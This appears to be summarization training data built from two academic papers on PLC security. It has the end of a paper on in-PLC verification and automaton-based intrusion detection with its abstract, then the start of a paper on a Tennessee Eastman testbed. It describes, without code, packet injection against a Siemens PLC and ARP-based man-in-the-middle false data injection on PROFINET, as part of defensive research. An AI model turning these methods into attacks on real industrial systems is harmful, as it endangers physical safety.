are outside the scope of this paper. III. CYBER-PHYSICAL VERIFICATION WITHIN A PLC SCAN CYCLE Previous bump-in-the-wire verification solutions have been implemented in order to symbolically verify the logical programs downloaded to a PLC against temporal safety properties. However, these solutions rely heavily on the soundness and completeness of their external, offline verification solutions. Fig. 3. CPS Verification: (1) PG/Client/HMI writes to the temporary buffer; (2) a function in the verification library is called to verify this value; (3) if the value doesn't violate safety constraints, the value in the temporary buffer is transferred to the destination buffer. There is an inherent difficulty in defining and verifying cyber-physical safety properties given the variety of inputs in a typical PLC program and the complexity of the underlying physical invariant properties. Similarly, IDS models are passive, external security solutions. Previously proposed models seem to have only been implemented for offline traffic analysis. In both cases, there is no active verification of values written to memory in the PLC. PLCs support memory protection and access control, but several programs still provide PLC clients with the capability of modifying the variables that represent discrete attributes of the cyber-physical solution. Using PLCs coupled with embedded hypervisors, active cyber-physical verification of values written to memory can be implemented and directly integrated into the scan cycle of a PLC. Our solution leverages this coupling to verify values written to areas of memory in the PLC. A high-level overview and control flow of a sample solution is presented in Figure 3. The solution works by restricting writes to PLC memory to designated temporary buffers. When a write to the temporary buffer is detected, the functional programming block associated with the embedded hypervisor library function is invoked and passes the system state to the embedded hypervisor. The written value is verified against previously defined temporal safety properties based on the underlying physical model and the current system state.
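The temporary-buffer gating just described can be sketched in a few lines. This is a minimal illustration of the control flow only, not the WinAC ODK interface: the buffer layout, the `verify` predicate, and the safety bounds are all assumptions.

```python
# Hypothetical sketch of the write-gating flow: a client write lands in a
# temporary buffer, a verification routine (standing in for the hypervisor
# library call) checks it against safety properties, and only verified
# values reach the destination buffer the control logic actually reads.

def verify(value, state):
    # Illustrative safety property: a new speed setpoint must stay within
    # bounds and must not change while a cut is in progress.
    in_bounds = 0 <= value <= 100
    return in_bounds and not state["cutting"]

def gated_write(value, state, destination):
    temp_buffer = value              # (1) client writes to the temporary buffer
    if verify(temp_buffer, state):   # (2) hypervisor-side verification
        destination["speed"] = temp_buffer  # (3) forward to destination buffer
        return True
    return False                     # blocked; a notification would be raised

state = {"cutting": False}
dest = {"speed": 10}
assert gated_write(50, state, dest) and dest["speed"] == 50
state["cutting"] = True
assert not gated_write(80, state, dest) and dest["speed"] == 50  # write blocked
```

The key design point mirrored here is that the control logic only ever reads the destination buffer, so an unverified client write can never reach it.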
If the value written to the temporary buffer doesn't violate any safety or security constraints, the embedded hypervisor returns a signal to the PLC that allows the value to be forwarded to the destination memory buffer. Otherwise, the transfer is blocked and a notification can be raised to the operator that an unsafe command has been issued. Fig. 4. Passive IDS implementation within the embedded hypervisor. The PLC and the hypervisor listen on the same port. The hypervisor maintains a model of the traffic for anomaly detection, such as the expected queries (Q) and responses (R) in an Ethernet protocol, in parallel to the PLC running the control logic program. The purpose of interacting with the embedded hypervisor is to provide the ability to perform advanced calculations on the underlying physical system model. For example, if a PLC is controlling significant components of an electric power grid, e.g., circuit breakers and tap changers of transformers, the embedded hypervisor can take care of running optimal power flow equations to determine, in real time, the impact of a particular action, e.g., opening/closing a circuit breaker. IV. AUTOMATON-BASED CONTROLLER ANOMALY DETECTION The embedded hypervisors can also be used to implement an online IDS from within the PLC. IDS solutions have been proposed for modeling PLC traffic for the purpose of detecting malicious packets. Our solution is based on the deterministic finite automaton (DFA) solution presented in [8] and [6]. Figure 4 presents a simple DFA example of Modbus traffic. In this system, an expected periodic traffic pattern is a sequence of four packets: a first query (Q1), a response to the first query (R1), a second query (Q2), and a response to the second query (R2).
If a subsequent packet represents the next expected state in the pattern, then we have a Normal transition from one DFA state to the next. If the subsequent packet is the same as the current packet, then we have a Retransmission and the DFA remains in the same state. If the subsequent packet is not the expected packet but is within the subset {Q1, R1, Q2, R2}, then we have a Miss and the DFA transitions to the state of the subsequent packet. If the subsequent packet is not the expected packet and is not within this subset, then we have an Unknown and the DFA transitions to the beginning of the pattern sequence. An Unknown transition is the worst type of transition and can generally be expected to be an intrusion. Further details of the DFA algorithm, as well as its application to specific PLC Ethernet protocols, can be found in the aforementioned papers. Fig. 5. CPS Verification Solution. The WinAC ODK implementation allows the main scan-cycle programming block, OB1, to invoke the automatically generated functional programming blocks, FBs, associated with the verification library functions of the DLL located in the embedded hypervisor. The data block, HMI2PLC DB, can be written to by the legitimate HMI panel of our cyber-physical system or by a malicious client on the network. V. EVALUATIONS In this section, we present our evaluations and implementations of the two proposed security solutions. Both of our solutions were implemented using the SIMATIC ET 200SP Open Controller, CPU 1515 PC. The PLC has a hypervisor with Windows Embedded 7E 32-bit. We used the SIMATIC WinAC Open Development Kit (ODK) to implement both of our solutions.
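The four transition types above can be sketched as a small classifier. This is an illustrative reimplementation of the rule set from [8] and [6], not the authors' code; the pattern and symbol names are assumptions.

```python
# Classify each incoming symbol against a learned periodic pattern.
# step() returns the transition type and the next DFA position.

PATTERN = ["Q1", "R1", "Q2", "R2"]  # illustrative learned pattern
ALPHABET = set(PATTERN)

def step(pos, symbol):
    expected = PATTERN[pos]
    if symbol == expected:                    # Normal: advance to next state
        return "Normal", (pos + 1) % len(PATTERN)
    current = PATTERN[pos - 1]                # most recently accepted symbol
    if symbol == current:                     # Retransmission: stay in state
        return "Retransmission", pos
    if symbol in ALPHABET:                    # Miss: jump to that symbol's state
        return "Miss", (PATTERN.index(symbol) + 1) % len(PATTERN)
    return "Unknown", 0                       # Unknown: restart the pattern

pos = 0
events = []
for sym in ["Q1", "R1", "R1", "Q2", "R2", "EVIL"]:
    kind, pos = step(pos, sym)
    events.append(kind)
print(events)
# → ['Normal', 'Normal', 'Retransmission', 'Normal', 'Normal', 'Unknown']
```

An out-of-alphabet symbol produces the Unknown transition that, per the text, is the strongest indicator of an intrusion.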
The WinAC ODK provides an API for Microsoft Visual Studio that allows developers to generate DLLs with the desired library functions to be stored on the embedded hypervisor, while also generating the associated programming blocks that are directly downloaded to the PLC and can interface with the DLL through shared memory. A. Cyber-Physical Verification Solution The previous simple scenario was directly integrated into a cyber-physical simulation program. Figure 5 provides an overview of the cyber-physical system used in our solution. The associated physical system in this scenario is a laser-cutting tool that places materials onto a cutting platform and cuts a particular shape specified by the operator. Typically the HMI reads from and writes to a specific DB, which we labeled HMI2PLC. We developed an attack scenario in which a hacker uses a Snap7 client to inject malicious packets that alter this DB. We integrated the WinAC ODK functions directly into the main cyclic programming block, OB1. Table I provides the safety specifications of our sample security solution. The first safety specification states that the system should not receive a manual direction signal moving the cutter up, down, left, or right while the system is in Auto mode, meaning that the cutting should be automatic. When OB1 detects a direction signal, a call to the associated WinAC ODK function is triggered. The WinAC ODK function then checks the relevant status bits and, if there is a violation of the safety specification, raises an alarm (e.g., a notification is raised on the HMI panel). The second safety specification states that the laser cutter's homing position (i.e., the position the cutter returns to when it has finished a full cutting cycle) cannot change while the system is not in Auto mode and not in Idle mode, which is simply the mode indicating that the cutter is standing idle.
If OB1 detects that either the X- or Y-coordinate of the homing-position setting has changed, it invokes the associated WinAC ODK function in the same manner to verify the change against these safety rules. If the WinAC ODK function detects a violation, it raises a signal that forces the system to finish the current cutting cycle and stop production until the operator acknowledges the intrusion. The final specification states that the cutting speed of the laser cannot change while in Auto mode and while the Cutting indicator is true. If OB1 detects a change in the cutting speed, it invokes another WinAC ODK function that issues an Emergency Stop signal if the rule was violated. Although these rules could easily have been implemented using simple ladder logic or STL programming, they serve as placeholders for advanced calculations of physical equations. Our goal was to demonstrate a highly coupled PLC verification solution. Furthermore, these solutions can be directly integrated into the scan-cycle timing, allowing developers to account for the verification solution in their timing specifications. The associated programming blocks can be invoked synchronously or asynchronously depending on the safety/operational requirements of the scan cycle. This IDS relies on the assumption that the proprietary protocol has not been reverse engineered. If the PLC's programming protocol(s) are reverse engineered, a hacker who is able to establish a programming connection to the PLC can simply program blocks that overwrite or skip over the security implementation. B. Online Automaton-Based Anomaly Detection Solution Our IDS solution implements an online analysis using T-Shark [9] to inspect every packet from within the embedded hypervisor. Using our knowledge of the S7-comm protocol from David Nardella's analysis, we built our solution on top of an already existing S7-comm Wireshark dissector plugin.
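The three trigger/condition/response rules can be sketched as a small rule table. This is a minimal illustration using the condition expressions as printed in Table I; the signal names and the dispatch mechanism are assumptions, not the WinAC ODK interface.

```python
# Hypothetical rule table mirroring Table I: each trigger maps to a safety
# condition (which must hold for the action to be allowed) and a response
# raised when the condition is violated.

RULES = {
    "manual_direction":      (lambda s: not s["auto"],                   "Notification"),
    "home_position_changed": (lambda s: not s["auto"] and not s["idle"], "Stop Production"),
    "cutting_speed_changed": (lambda s: not s["auto"] and not s["cutting"], "Emergency Stop"),
}

def check(trigger, state):
    # Return None when the action is safe, or the violation response.
    condition, response = RULES[trigger]
    return None if condition(state) else response

state = {"auto": True, "idle": False, "cutting": True}
print(check("manual_direction", state))        # violated while in Auto mode
print(check("cutting_speed_changed", state))   # violated while cutting
```

In the real system the checks run inside the ODK library functions invoked from OB1; here they are plain Python predicates evaluated against a status dictionary.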
We directly integrated the DFA IDS into the packet dissection so that every packet over the S7-comm protocol is processed through our model.

TABLE I. SAFETY SPECIFICATIONS FOR LASER-CUTTING SYSTEM
Trigger Signal | Safety Conditions | Violation Response
Manual Direction Click (up/down/left/right) | !(Auto) | Notification
Home Position Changed | !(Auto) && !(Idle) | Stop Production
Cutting Speed Changed | !(Auto) && !(Cutting) | Emergency Stop

Fig. 6. Deep packet inspection from within the PLC. The solution first trains the model by queueing the headers of the first 1500 incoming packets and generating a DFA based on the training set, usually a sequence of queries, Q, and responses, R. This DFA is then used to enforce intrusion detection within the hypervisor. Figure 6 shows an overview of our IDS implementation. T-Shark listens on port 102, i.e., the shared PLC Ethernet port, for incoming packets, and our plugin dissects any packets that use the S7-comm protocol. As in [6], we have a learning stage (where the periodic pattern is learned) and an enforcement stage (where each packet is checked against the learned pattern). The symbols of our DFA are based solely on the headers of the S7-comm PDU. We split any multi-reads or multi-writes into individual symbols. For example, if one packet specifies a write to 18 variables, we split that packet into 18 separate symbols with the same prefix. Initially, we set our maximum pattern length to 1500 symbols, with a validation window size of 6000 (these numbers are taken from the latter aforementioned paper). Therefore, our plugin queues the first 6000 packets, which are assumed to be benign.
Starting at a pattern length of 2 and increasing up to 1500, we check which pattern length best fits the periodic data. A pattern's performance is essentially determined by the number of Normals over the total number of transitions (Normals + Misses + Retransmissions + Unknowns). Once we select an appropriate pattern, we set this pattern as our DFA. Each subsequent symbol is checked against this DFA, and any Misses, Retransmissions, or Unknowns are reported accordingly. In our solution, we had the program write a portion of memory that signals an alarm whenever an Unknown symbol is detected. Furthermore, we had to enlarge our validation window size and maximum pattern length, as the simulation program generated many more than 1500 symbols in one cycle. We reinforced the IDS solution by ensuring that Retransmission packets were valid. Because the DFA solution discards the actual data values being written to variables, an attacker could generate a packet that has the same symbols as a previous packet and manipulate the data. Because the pattern is periodic, the attacker can then find a way to inject the packet so that it lands in the sequence just before or after the same packet in the pattern. The DFA solution would simply identify this packet, along with the extra acknowledgement packet, as Retransmission symbols (since there will most likely be two acknowledgement packets in a row). To resolve this issue, we keep a data buffer that holds the data of the previous packet. If the current packet is identified as a Retransmission, we compare the two data buffers and make sure nothing has changed. Although this does not mitigate the case of Misses (as the data would not be expected to be the same), we can guarantee that valid Retransmissions are benign. In addition to not being able to validate Miss packets, there are a couple of limitations to this IDS solution. First, it relies on the data being highly periodic.
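The pattern-length selection described above can be sketched as a scoring loop: replay the training symbols through each candidate pattern and score the candidate by the fraction of Normal transitions. This is an illustrative reconstruction, not the plugin's code; the symbol stream is made up, and the Retransmission case is omitted for brevity.

```python
# Score candidate pattern lengths on a training stream: for each length L,
# take the first L symbols as the pattern, replay the rest through a
# simplified DFA (Normal / Miss / Unknown only), and count the fraction of
# Normal transitions. Pick the best-scoring length.

def score(pattern, stream):
    pos, normals = 0, 0
    for sym in stream:
        if sym == pattern[pos]:        # Normal transition
            normals += 1
            pos = (pos + 1) % len(pattern)
        elif sym in pattern:           # Miss: resynchronize to that state
            pos = (pattern.index(sym) + 1) % len(pattern)
        else:                          # Unknown: restart the pattern
            pos = 0
    return normals / len(stream)

training = ["Q1", "R1", "Q2", "R2"] * 50   # perfectly periodic toy stream
best = max(range(2, 9), key=lambda L: score(training[:L], training[L:]))
print(best)  # the true period (4) scores highest
```

On a real capture the scores are below 1.0 and the search runs up to the configured maximum pattern length, but the selection criterion is the same ratio of Normals to total transitions.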
For fully automated systems where there is little to no human interaction, our IDS solution would have extremely high intrusion-detection accuracy. However, most industrial control systems involve operators who use HMI panels to send commands to the PLCs. The simulation program was designed to simulate an operator who starts the cutting process between 1 and 10 seconds into every cycle. This operation generates one symbol, i.e., the packet the operator sends to start the cutting process. This symbol will almost always be identified as a Miss, since the operator starts the process at a different point in the pattern sequence every time. This false positive could most likely be mitigated by adapting the learning process to the application-specific pattern. There are many ways to modify the algorithm by incorporating supervised learning. As a standalone, unsupervised process, though, our algorithm can only guarantee that Normal, Retransmission, and Unknown packets will be properly identified and handled accordingly. However, the goal of this solution was to present a sample IDS solution that can be embedded within the PLC. Having an advanced embedded hypervisor coupled with the PLC allows the system to provide online deep-packet inspection. VI. RELATED WORK In this section, we present several related verification and security solutions for PLCs. It is worth noting that our solutions emphasize the ability to verify and secure the PLC from within the device, not the security models themselves. We first review works related to the guidelines associated with securing control systems. In [10], NIST guideline security architectures are presented for ICS with respect to supervisory control and data acquisition systems, distributed control systems, and PLCs.
Similar guidelines for the energy industry are presented in [11] and [12]. [13] and [14] argue that compliance with these standards provides a false sense of security. We now discuss previous security and verification solutions presented for control systems. TSV [4] presented an external bump-in-the-wire verifier for process controller code downloaded to the PLC. Mohan et al. [15] introduced a monitor that dynamically checks the safety of plant behavior. Offline intrusion detection solutions have been proposed to model PLC traffic as a deterministic finite automaton in [8] and [6]. Another model-based intrusion detection solution was proposed in [16]. In all cases, the security solutions were implemented externally, as opposed to within the PLC. Avatar [17] provides a framework to support dynamic security analysis of embedded systems firmware. However, the firmware resides below the control-logic level, and security/verification solutions cannot be easily integrated into the scan cycle of the PLC. In general, our solution focuses more on application-level security solutions. [18] uses mathematical analysis techniques to evaluate various aspects of a given control system, such as safety and reliability, but focuses on accidental failures rather than malicious actions. PLC vendors themselves typically use basic security mechanisms with a single privilege level [4]. VII. CONCLUSIONS In this paper we presented two security models for PLCs that leverage the advanced computational power of embedded hypervisors coupled with PLCs. We evaluated implementations of both models on a real PLC in a simulated cyber-physical system with unpredictable operation. ACKNOWLEDGEMENT The authors would like to express their gratitude to George Trummer, Stefan Woronka, Ben Collar and Frank Garrabrant for their insightful feedback and constructive suggestions. This material is based upon work supported by Siemens as well as the Department of Energy under Award Number DE-OE0000780.
Summary:
With an increased emphasis on the cyber-physical security of safety-critical industrial control systems, programmable logic controllers have been targeted by both security researchers and attackers as critical assets. Security and verification solutions have been proposed and/or implemented either externally or with limited computational power. Online verification or intrusion detection solutions are typically difficult to implement within the control logic of the programmable logic controller due to strict timing requirements and limited resources. Recently, there has been increased advancement in open controller systems, where programmable logic controllers are coupled with embedded hypervisors running operating systems with much more computational power. Development environments are provided that allow developers to directly integrate library function calls from the embedded hypervisor into the program scan cycle of the programmable logic controller. In this paper, we leverage these coupled environments to implement online cyber-physical verification solutions directly integrated into the program scan cycle, as well as online intrusion detection systems within the embedded hypervisor. This novel approach allows advanced security and verification solutions to be enforced directly from within the programmable logic controller program scan cycle. We evaluate the proposed solutions on a commercial-off-the-shelf Siemens product.
|
Summarize:
INDEX TERMS Industrial control systems, cyber attack, attack detection algorithm, man-in-the-middle attack, hybrid testbed. I. INTRODUCTION Recent technological advances in control, computing, and communications have generated intense interest in the development of a new generation of highly interconnected and sensor-rich systems known as critical Cyber-Physical Systems (CPS) infrastructure, with applications in a variety of engineering domains such as process and automation systems, the smart grid and smart cities, and healthcare systems. (The associate editor coordinating the review of this manuscript and approving it for publication was Wentao Fan.) These complex systems are becoming more distributed and computer-networked, which has necessitated the development of novel monitoring, diagnostics, and distributed control technologies. Supervisory Control And Data Acquisition (SCADA) systems, Wireless Sensor Networks (WSN), and PLCs are now established paradigms that are utilized in much critical CPS infrastructure. On the other hand, the envisaged complex CPS infrastructure requires more than ever the development of novel and proactive security technologies, as these systems are continuously being targeted by cyber attacks and intrusions by intelligent malicious adversaries. The adversaries are capable of attacking the core control systems that are employed in all key cyber-physical systems infrastructure. These scenarios do not exist in, and are not similar to, the security challenges present in traditional IT systems. Therefore, there exists an urgent need to study the vulnerabilities, analyze the risks, and develop defensive and mitigation mechanisms for critical CPS infrastructure. VOLUME 9, 2021. This work is licensed under a Creative Commons Attribution 4.0 License. Due to the sensitivity and high importance of safety-critical systems in real life, any research activity that is directly applied to the physical infrastructure can lead to disruption,
For more information, see https://creativecommons.org/licenses/by/4.0/ (M. Noorizadeh et al.: Cyber-Security Methodology for a Cyber-Physical Industrial Control System Testbed.) unexpected damages or losses, and hence the development of testbeds that mimic the behavior of CPS in a small-scale fashion is highly essential for the development of various cyber-security technologies. In this paper, a hybrid cyber-physical testbed for industrial control systems is developed, and various types of real cyber attack scenarios are injected and implemented. Moreover, online real-time cyber attack detection algorithms are proposed to provide a comprehensive solution to the cyber-security of cyber-physical industrial control systems (ICS). ICS testbeds generally consist of two main components, namely the physical process and the field devices such as PLCs, HMIs, RTUs, etc. Depending on the implementation method, ICS testbeds are classified into three main categories [1]: I) simulation testbeds, in which both components of the ICS are based solely on computer simulation [2]; II) physical testbeds, where real physical parts are used for both components [3]; and III) hybrid testbeds, in which a combination of simulation and physical testbed is considered: some components, such as the physical process, are simulated and the rest are based on actual physical parts [4], [5]. In this paper, the hybrid testbed architecture is selected for the development of the ICS testbed, where the Tennessee Eastman (TE) plant is simulated on a PC and the remaining parts are implemented using actual industrial hardware. The TE plant is selected as the industrial process for our cyber-security testbed for the following reasons. First, the TE model is a well-known chemical process that is used in control systems research, and its dynamics are well understood.
Second, it should be properly controlled; otherwise, small disturbances will drive the system towards an unsafe and unstable operation. The inherent open-loop unstable property of the TE process presents a real-world scenario in which a cyber attack could correspond to a real risk to human safety, environmental safety, and economic viability. Third, the TE process is complex, coupled, and highly nonlinear, and has many degrees of freedom by which to control and perturb the dynamics of the process. Finally, various simulations of the TE process have been developed with readily available, reusable code designed by Ricker [6].

From the anomaly detection perspective, cyber attack detection algorithms can be divided into five main categories, namely: linear, proximity-based, probabilistic, outlier ensembles, and neural network approaches [7]. Therefore, in order to have a comprehensive comparison of cyber attack detection approaches that fit the TE process, the following algorithms have been chosen from these various categories: Principal Component Analysis (PCA), One-Class Support Vector Machines (OCSVM), Local Outlier Factor (LOF), k-Nearest-Neighbors (kNN), and Isolation Forest (IF). Comparative studies are conducted based on the cyber attack detection time and the confusion matrix performance metrics, where subsequently the OCSVM and kNN are demonstrated to yield promising performance for accomplishing the cyber attack detection objective.

A. BACKGROUND
Cyber attacks on TE processes are also investigated in the literature. In [8], an integrity attack is injected on the manipulated variable signals and the corresponding sensor measurements are observed by a correlation-based clustering algorithm. Different studies have been conducted on finding the optimal time to launch the Denial of Service (DoS) attack on either the sensor or actuator signals in the TE process [9]–[11].
Several cyber attack detection methods such as model-based approaches [12], [13], clustering-based approaches [14], Gaussian mixture models [15], and RNN-based approaches [16] are developed for the detection of different cyber attacks on the TE process. However, all of the above works are based on the simulated TE process and the cyber attacks are mainly emulated inside the simulation file. Furthermore, several recent ICS testbeds for investigating cyber security are developed in the literature, and Table 1 presents comparisons among these testbeds for a diverse range of applications based on Type (simulation (S), physical (P), real ICS (R), and hybrid (H)), Process, Data Type (network data (NET) and process data (PR)), Detection Method, Attacks, and Attack Type (emulation (E) and physical (P)). As shown in this table, in [17]–[25] cyber-physical testbeds are developed for the physical water system and different case studies in terms of data type, communication, and attack injection/detection are presented. In [17], a model-based detection approach is developed to detect three different attacks by using network data. Also, a physics-based detection approach is presented in [18] in order to detect a stealthy vulnerability by using the process data. In [19], an Intrusion Detection System (IDS) approach is developed to detect four various attacks by using network data. In [20], different data-driven intrusion detection algorithms are developed using the network data from the Modbus communication protocol. In [21]–[25], water system testbeds are developed based on the Ethernet/IP communication protocol. A power system testbed is designed and implemented in [26]–[28]. A simulation testbed is used in [26], and in [27] a physical testbed is developed and different attack detection algorithms are developed by using both the network and the process data.
In [29], [30], a simplified version of the Tennessee Eastman process is utilized as the physical plant in the testbed and model-based attack detection algorithms are proposed for the simulation-based testbeds without considering any physical hardware in the simulator.

B. CONTRIBUTIONS
In this paper, the full version of the nonlinear chemical Tennessee Eastman process is used as the physical process in the developed hybrid testbed. Moreover, based on the structure and features of PROFINET as the industrial field bus that is used in the Siemens distributed I/O, an actual real-time false data injection cyber attack is implemented

TABLE 1. Overview of the existing testbeds for cyber-security study.

through the man-in-the-middle (MITM) architecture on the developed testbed. This is achieved by utilizing the Address Resolution Protocol such that the cyber hacker acts as the MITM in the closed-loop system and modifies the sensor measurements sent to the PLC or the actuator commands that are sent to the distributed I/O. Furthermore, various real-time online cyber attack detection algorithms are developed and implemented on the testbed and their performance capabilities are compared and evaluated. Consequently, this is the first work in the literature that completely simulates a full version of the Tennessee Eastman process using a hybrid testbed. In other words, this work provides a comprehensive solution for the cyber-security of ICS with the following main contributions:
1) A hybrid testbed is developed by using the simulated full version of the Tennessee Eastman process as a nonlinear unstable process together with the Siemens field devices such as the PLC and distributed I/O, whereas the previous work in [29], [30] only considered the simplified version of TE without having any actual hardware in the testbed.
2) Real-time false data injection cyber attacks are implemented by compromising the PROFINET field-bus protocol for the first time in the literature, whereas, as shown in Table 1, all of the previous works are based on either the Modbus or the Ethernet communication protocols.
3) Several online cyber attack detection methodologies such as PCA, OCSVM, LOF, kNN, and IF are developed and implemented for real-time detection of cyber attacks in the supervisory level of the testbed. In contrast, in most of the previous work in the literature, the detection algorithms are implemented off-line after collecting the data from the testbed.

The remainder of this paper is organized as follows. In Section II, the developed hybrid ICS testbed is presented. Section III provides details on the PROFINET field bus protocol that is used in the testbed, and in Section IV the implementation of the false data injection cyber attack is described and introduced. Section V presents the proposed cyber attack detection methodologies, and in Section VI their performances are quantitatively demonstrated, validated, and verified subject to various cyber attack scenarios. Finally, in Section VII, conclusions and future work are provided.

II. HYBRID ICS TESTBED
The cyber-physical ICS includes three main components, namely, a physical plant to be controlled, an embedded system for implementing the controller, and a communication network for exchanging the information between the controller and the plant. In the developed testbed, these components are all considered, where the plant is simulated inside a PC, the controller is implemented on actual hardware (PLCs), and finally the communication is established by using the industrial protocol, namely, PROFINET. As shown in Fig.
1, the developed testbed is partitioned into four layers: (1) the Tennessee Eastman plant that is simulated by a PC, (2) the field devices that are emulated by using DAQ boards and the Siemens distributed I/O, (3) the control layer implemented using the Siemens PLCs, and (4) the supervisory layer using an additional Siemens PLC and web-server. Moreover, the mathematical model of the TE process is implemented and simulated in the Matlab/Simulink environment and the controllers are implemented by using the PLCs. The interface between the plant simulation and the PLCs is accomplished by using the DAQ boards and the distributed I/O modules. The DAQ boards generate voltages that are proportional to various plant variables and also acquire the input voltages as the actuator command signals from the controller. Hence, by using the DAQs, different sensors and actuators inside the plant are emulated in the testbed. The distributed I/O modules provide the interface between the plant sensors/actuators and the PLCs. Consequently, the DAQ boards and the distributed I/O modules emulate layer 1 within the industrial automation hierarchy, namely the field layer.

FIGURE 1. The developed hybrid ICS testbed.

A. TENNESSEE EASTMAN (TE) PROCESS SIMULATION
The TE process was first described by Downs and Vogel in 1993 [6], [31] and is modeled through fifty (50) nonlinear and coupled differential equations [32]. It consists of five major operational units, namely: (1) chemical reactor, (2) product condenser, (3) recycle compressor, (4) vapor-liquid separator, and (5) product stripper. Two liquid products (G, H) are produced by using the A, C, D, and E gaseous reactants, with B and F as the inert and byproduct, respectively. The chemical reactions are irreversible and can be presented as follows:

A(g) + C(g) + D(g) → G(l), Product 1
A(g) + C(g) + E(g) → H(l), Product 2
A(g) + E(g) → F(l), Byproduct
3D(g) → 2F(l), Byproduct

The TE process is a nonlinear open-loop unstable process which reaches its shutdown constraints in less than 2 hours.
Accordingly, a controller is required to maintain the system in the steady state and the process variables at desired values, and to enforce hard constraints on the process variables such as the reactor pressure, the reactor level, and the reactor temperature, among others [31], [33]. The TE process has 12 manipulated variables (XMVs), 41 measured variables (XMEAS), and 20 different process disturbances (IDVs) which can be chosen by the user [6]. The output measurements (XMEAS) of the plant are divided into 22 continuous-time and 19 discrete-time measurements. In the testbed developed in this work, only 9 inputs and 16 continuous-time outputs are used, as specified in Tables 2 and 3, respectively. It should be noted that the time unit of the original TE process model was in hours, which is not suitable for a real-time simulation. Thus, in order to make the process real-time, the model is modified accordingly by changing the state dynamics of the system and correspondingly the controller gains.

TABLE 2. Manipulated variables used in the testbed.

TABLE 3. Process measurements used in the testbed.

B. FIELD DEVICE AND CONTROL LAYERS
In the developed ICS testbed, the Siemens S7-1200 PLC CPU and the SIMATIC ET 200SP distributed I/O modules are used. For establishing the interface between the simulated process on the PC and the PLCs and distributed modules, MF644 and MF634 DAQ boards are used, mainly due to their high number of analog inputs/outputs and their compatibility with MATLAB/Simulink. Each I/O module contains 4 analog inputs and 2 analog outputs, and in order to connect all PLCs with all I/Os, the Siemens CSM 1277 switch modules are used. As shown in Fig. 1, the DAQ boards convert sensor measurements from the TE process (implemented by a PC) to analog signals and feed them to the distributed I/O modules.
At the same time, the DAQ boards receive the actuator signals from the distributed I/Os and feed them back to the TE process that is simulated in Simulink. All communications between the distributed I/O modules and the PLCs are based on the PROFINET protocol, which is an open real-time Industrial Ethernet standard protocol that can be used for virtually any function required in automation, namely: discrete, process, motion, peer-to-peer integration, vertical integration, and safety, among others. As shown in Table 4, the closed-loop controller scheme for the testbed contains 9 main Proportional-Integral (PI) controllers on five PLCs that regulate the flow rate of each valve, and 8 internal PI loops for generating the internal set-points and variables that are needed in the main PI controllers. Accordingly, all the PI controllers' gains have been selected from the original paper in [31]. Subsequently, in order to convert the process to a real-time process in terms of process run time, all the Ti gains are multiplied by 3600. The corresponding measurements and control inputs for each I/O module and the corresponding PLC are specified in Fig. 2. Moreover, as illustrated in this figure, XMEAS 17 and the production rate (FP, as an internal variable in PLC1) are also required by the other PLCs, which is implemented by using the Siemens S7 communication protocol.

TABLE 4. Distribution of the TE control blocks in PLCs.

C. SUPERVISORY LAYER
As depicted in Fig. 1, the supervisory layer that consists of the PLC 6 is the last layer of the TE testbed. Each Siemens S7-1200 contains internal memory that can be accessed through a web-server.

FIGURE 2. The TE process block diagram.

In other words, the web-server provides a local cloud that allows the user access to and control over the PLC internal memory, the ability to stop/run the PLC, and many other features remotely (through the PLC static IP address).
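Returning to the control layer, the hours-to-seconds rescaling of the integral times described above can be sketched as follows. This is an illustrative discrete PI implementation, not the authors' PLC code; the gain values, the sample time, and the first-order plant used in the check are all hypothetical:

```python
# Minimal discrete PI controller sketch; kc and ti values are illustrative,
# not the tuned gains of [31].
class PI:
    def __init__(self, kc, ti_hours, dt):
        self.kc = kc
        # The original TE gains use hours as the time unit; multiplying
        # Ti by 3600 converts the integral time to seconds for real time.
        self.ti = ti_hours * 3600.0
        self.dt = dt
        self.integral = 0.0

    def step(self, setpoint, measurement):
        error = setpoint - measurement
        self.integral += error * self.dt
        return self.kc * (error + self.integral / self.ti)

# Closed-loop check against a simple first-order plant (tau = 5 s).
pi = PI(kc=2.0, ti_hours=0.01, dt=0.1)
y = 0.0
for _ in range(20000):                    # 2000 s of simulated time
    u = pi.step(setpoint=1.0, measurement=y)
    y += (u - y) / 5.0 * 0.1
y_final = y
```

The integral action slowly removes the steady-state offset left by the proportional term, so the measured output settles at the set-point.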
In the developed testbed, as shown in Fig. 2, by using the Siemens internal communication protocol known as the S7 communication, all measurement and actuator data of each PLC are transferred to, and stored in, the PLC 6 internal memory. Subsequently, these data can be downloaded from the web-server for training or for online cyber attack detection purposes, as will be presented and described in Section V.

D. VULNERABILITIES AND CYBER ATTACK GATEWAYS AND POINTS
Figure 2 illustrates the cyber attack gateways and points on the testbed where malicious hackers can gain access to the communication link between the PLC and the I/O modules. By accessing each communication link, the malicious hackers can inject different cyber attacks on the sensor measurements as well as the actuator commands corresponding to that communication link. For example, as shown in Fig. 2 and Table 4, if the hacker accesses the communication link between PLC1 and I/O module 1 (labeled as communication link #1), then the sensor measurements XMEAS 2, 3, 17, and 40 and the actuator commands XMV 1 and 2 can be compromised.

III. COMMUNICATION PROTOCOLS
A. PROFINET
The Siemens S7-1200 utilizes the PROFINET protocol suite as an industrial Ethernet standard, together with the S7 communication protocol, in order to communicate with other network nodes. The PROFINET protocol is a standard protocol that is heavily promoted by Siemens as one of the main industrial Ethernet communication protocols. It has inherited its architecture from the native OSI model, with TCP/IP for cyclic and acyclic data and UDP/IP for context management. A PROFINET architecture/system requires at least three nodes to operate, namely: the IO Controller (PLC), the IO Module (sensors and actuators), and the IO Supervisor (Engineering Station or HMI Device).
Moreover, PROFINET inherits a variety of Information Technology protocols within its substructure to establish and maintain connectivity, and is hence susceptible to cyber attack surfaces similar to those present in standard Ethernet environments. One of the main characteristics of the PROFINET protocol suite that distinguishes it from the other ICS protocols is that it prioritizes the type of communication based on real-time requirements. Consequently, as shown in Fig. 3, two channels are introduced, namely Real-Time (RT) and Non-Real-Time (NRT), and both channels coexist in the Application Relation (AR) between the IO Device and the IO Controller. An Application Relation is a state to which both the IO Device and the IO Controller need to converge in order to initialize the transmission of the cyclic data. However, a handshake is a prerequisite to this state, which is conducted by the PROFINET Context-Manager (PN-CM).

FIGURE 3. The PROFINET IO RT and NRT stack.18

In terms of the C.I.A security aspects (confidentiality, integrity, and availability) of the PROFINET protocol, it is shown in this work that to compromise the confidentiality of the cyclic data, a hacker can read the data in plain text through an Address Resolution Protocol (ARP)-compromising attack; to compromise integrity, the hacker can inject false data through the network switch; and to compromise availability, a port stealing attack would make the service temporarily unavailable.

B. PROFINET IO REAL-TIME PROTOCOL STRUCTURE
